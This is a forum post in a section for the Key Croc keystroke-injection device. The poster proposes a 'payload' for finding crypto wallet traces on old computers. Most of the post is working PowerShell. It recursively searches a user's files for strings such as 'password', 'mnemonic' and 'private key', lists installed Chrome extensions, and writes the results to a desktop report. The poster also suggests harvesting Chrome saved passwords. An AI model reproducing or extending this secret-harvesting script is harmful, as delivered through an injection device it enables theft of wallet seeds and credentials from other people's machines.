Jump to content

Input on payload idea? Search for traces of crypto wallets.

jimcola99

By jimcola99
in Key Croc

 Share

Recommended Posts

jimcola99 Newbie

jimcola99

Posted
Posted (edited)

Once I sold my Grandma's old purses at a yard sale.  This lady came up and started going through the pockets and found some change and gave it back to me.

Anyways,  When you buy an old computer or somebody dies and you get an old computer.  Why not search for traces of crypto wallets?

 

Here is some powershell that searches your profile for certain keys words and prints out your Chrome extensions.  Drops in a file called report.txt on your desktop.

Here is the powershell I got so far.  Thoughts, improvements?   Maybe search for filenames too, Figure out how to search strings in word and excel documents.  This only searches text documents.

Maybe grab the chrome saved passwords as well?  Search for multibit or electrum installed on the PC? 

write-output "Crypto Search"| Out-File -FilePath $env:USERPROFILE\Desktop\report.txt
$searchstrings = @("password", "bitcoin", "mnemonic", "private key", "coinbase", "monero", "multibit", "electrum")
foreach ($searchstring in $searchstrings)
    {
    Get-ChildItem -Path $env:USERPROFILE\*.* -Recurse  -Exclude report.txt -ErrorAction SilentlyContinue|Select-String -Pattern $searchstring|Out-File -Append -FilePath $env:USERPROFILE\Desktop\report.txt 
 }

$targetdir = "$env:LOCALAPPDATA\Google\Chrome\User Data\Default\Extensions"

$extensions = Get-ChildItem $targetdir
write-output "chrome extensions"| Out-File -Append -FilePath $env:USERPROFILE\Desktop\report.txt
Foreach($ext in $extensions){

Set-Location $targetdir\$ext -ErrorAction SilentlyContinue

$folders = (Get-ChildItem).Name

Foreach($folder in $folders){
Set-Location $folder -ErrorAction SilentlyContinue
$json = Get-Content manifest.json -Raw | ConvertFrom-Json
$obj = New-Object System.Object
$obj | Add-Member -MemberType NoteProperty -Name Name -Value $json.name
$obj | Add-Member -MemberType NoteProperty -Name Version -Value $json.version
Write-Output $obj | Out-File -Append -FilePath $env:USERPROFILE\Desktop\report.txt
}}

 

Edited by jimcola99
Link to comment
Share on other sites

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.

Guest
Reply to this topic...

×   Pasted as rich text.   Paste as plain text instead

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.

×
 Share
Go to topic listing

  • Recently Browsing   0 members

    • No registered users viewing this page.
×
×
  • Create New...